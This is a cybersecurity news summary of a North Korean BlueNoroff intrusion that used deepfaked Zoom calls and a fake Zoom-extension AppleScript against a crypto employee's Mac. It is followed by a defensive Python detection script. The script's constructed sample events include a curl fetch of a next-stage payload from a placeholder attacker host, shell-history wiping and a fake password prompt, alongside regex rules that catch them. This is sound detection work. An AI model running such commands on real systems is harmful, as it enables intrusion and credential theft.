CyberSecurity news

Source: The Hacker News (info@thehackernews.com)
BlueNoroff, a North Korean APT group, has been observed employing sophisticated tactics to target individuals in the Web3 and cryptocurrency sectors. This group, also known as TA444, Sapphire Sleet, COPERNICIUM, STARDUST CHOLLIMA, or CageyChameleon, is known for its financially motivated operations dating back to at least 2017. Their recent methods involve deceiving targets through fake Zoom calls, complete with deepfaked company executives, to trick them into installing malware on their macOS devices.

Huntress revealed details of a recent intrusion in which an employee at a cryptocurrency foundation received a Telegram message from an external contact requesting a meeting. The contact sent a Calendly link that redirected the employee to a fake Zoom domain controlled by the attackers. Weeks later, the employee joined a group Zoom meeting featuring deepfakes of senior leaders from their own company, along with other external contacts. When the employee was unable to use their microphone, the synthetic personas urged the target to download and install a Zoom extension, supposedly to fix the problem, delivered through a link sent via Telegram.

This malicious "extension," disguised as "zoom_sdk_support.scpt," is actually an AppleScript. The script first opens a legitimate Zoom SDK webpage as a distraction. Hidden within it, however, is code that downloads a next-stage payload from a remote server; that payload disables bash history logging and checks for the presence of Rosetta 2 (needed to run x86_64 binaries on Apple Silicon Macs). It creates a hidden file and downloads further binaries from malicious Zoom-themed web pages. The script prompts the user for their system password and wipes command history to cover its tracks. Analysis of compromised systems revealed multiple malicious binaries, including a Nim-based backdoor and a Go backdoor used for remote command execution and malware deployment.
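The behaviours described above (an AppleScript launched from a messaging app's download, shell-history tampering, a Rosetta 2 probe, a hidden-file download and a password dialog) are individually noisy but telling in combination. The following is an added illustration, not code from Huntress or The Hacker News: a small Python detection that runs regex rules over constructed process-execution events, groups matches by process lineage, and flags a lineage only when several distinct rules fire under one root. The event schema, field names, the `.invalid` URLs and every sample event are assumptions constructed for the example; no real indicators from the incident are used.

```python
import re

# Constructed sample process-execution events for illustration only (NOT telemetry
# from the real incident). Field names (ts, pid, ppid, proc, cmd) are assumptions.
SAMPLE_EVENTS = [
    {"ts": 1, "pid": 501, "ppid": 1, "proc": "Telegram",
     "cmd": "/Applications/Telegram.app/Contents/MacOS/Telegram"},
    # AppleScript launched straight from the user's Downloads folder
    {"ts": 2, "pid": 502, "ppid": 501, "proc": "osascript",
     "cmd": "/usr/bin/osascript /Users/alice/Downloads/zoom_sdk_support.scpt"},
    # decoy: opening a legitimate-looking page (placeholder host)
    {"ts": 3, "pid": 503, "ppid": 502, "proc": "open",
     "cmd": "/usr/bin/open https://EXAMPLE-LEGIT-SDK-PAGE.invalid/"},
    # next-stage fetch written to a dot-file (placeholder host)
    {"ts": 4, "pid": 504, "ppid": 502, "proc": "curl",
     "cmd": "/usr/bin/curl -s -o /tmp/.x https://ATTACKER-HOST-PLACEHOLDER.invalid/stage2"},
    # history tampering plus a Rosetta 2 probe (oahd is the Rosetta 2 daemon)
    {"ts": 5, "pid": 505, "ppid": 502, "proc": "bash",
     "cmd": "/bin/bash -c 'unset HISTFILE; pgrep -q oahd; history -c'"},
    # credential prompt via an AppleScript dialog with a hidden answer field
    {"ts": 6, "pid": 506, "ppid": 502, "proc": "osascript",
     "cmd": "osascript -e 'display dialog \"Zoom needs your password\" default answer \"\" with hidden answer'"},
    # benign activity in an unrelated process tree
    {"ts": 7, "pid": 600, "ppid": 1, "proc": "zsh", "cmd": "/bin/zsh -c 'ls -la'"},
]

# Each rule is (name, compiled regex applied to the command line).
RULES = [
    ("script_from_downloads", re.compile(r"osascript\s+\S*/Downloads/\S+\.scpt", re.I)),
    ("history_tampering", re.compile(r"unset\s+HISTFILE|HISTFILE=/dev/null|history\s+-c|set\s+\+o\s+history")),
    ("rosetta_probe", re.compile(r"\boahd\b|arch\s+-x86_64")),
    ("hidden_file_download", re.compile(r"curl\b.*-o\s+\S*/\.[^/\s]+")),
    ("password_dialog", re.compile(r"display dialog.*with hidden answer", re.I)),
]


def match_rules(events):
    """Return (ts, pid, rule_name) for every event/rule pair that matches."""
    hits = []
    for ev in events:
        for name, pattern in RULES:
            if pattern.search(ev["cmd"]):
                hits.append((ev["ts"], ev["pid"], name))
    return hits


def build_lineages(events):
    """Map each root pid (parent not present in the event set) to all pids beneath it."""
    pids = {ev["pid"] for ev in events}
    children, roots = {}, []
    for ev in events:
        if ev["ppid"] in pids:
            children.setdefault(ev["ppid"], []).append(ev["pid"])
        else:
            roots.append(ev["pid"])
    lineages = {}
    for root in roots:
        seen, stack = set(), [root]
        while stack:  # iterative DFS over the child map
            pid = stack.pop()
            if pid in seen:
                continue
            seen.add(pid)
            stack.extend(children.get(pid, []))
        lineages[root] = seen
    return lineages


def flag_chains(events, min_rules=3):
    """Flag a process lineage when at least min_rules distinct rules fire within it.

    Returns {root_pid: sorted list of rule names}. Requiring several distinct
    behaviours under one root keeps a lone `history -c` from paging anyone.
    """
    hits = match_rules(events)
    flagged = {}
    for root, pids in build_lineages(events).items():
        rules = sorted({name for _, pid, name in hits if pid in pids})
        if len(rules) >= min_rules:
            flagged[root] = rules
    return flagged


if __name__ == "__main__":
    for root, rules in flag_chains(SAMPLE_EVENTS).items():
        print(f"root pid {root}: {len(rules)} behaviours -> {', '.join(rules)}")
```

In real telemetry the event source would be an EDR or an Endpoint Security (ES) client feed rather than an inline list, and the lineage step matters more than any single regex: each rule on its own will fire on legitimate developer activity, but a Telegram-spawned `osascript` that goes on to tamper with history, probe Rosetta and raise a hidden-answer password dialog in one tree is worth a case.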



References:
  • Know Your Adversary: Huntress has shared its analysis of a recent BlueNoroff attack involving a macOS device, a fake Zoom extension and even deepfakes.
  • The Hacker News: BlueNoroff Deepfake Zoom Scam Hits Crypto Employee with macOS Backdoor Malware
  • Blog: Key findings. The Field Effect Analysis team has been investigating an incident involving a Canadian online gambling provider, where a threat actor employed social engineering tactics to take control of a victim’s computer and deploy infostealer malware.
  • www.huntress.com: Inside BlueNoroff Web3 Intrusion Analysis
Classification:
  • HashTags: #BlueNoroff #macOSMalware #Web3Security
  • Company: Huntress
  • Target: Cryptocurrency professionals
  • Attacker: BlueNoroff
  • Product: Zoom
  • Feature: fake Zoom calls
  • Malware: NodeInitRAT
  • Type: Malware
  • Severity: Major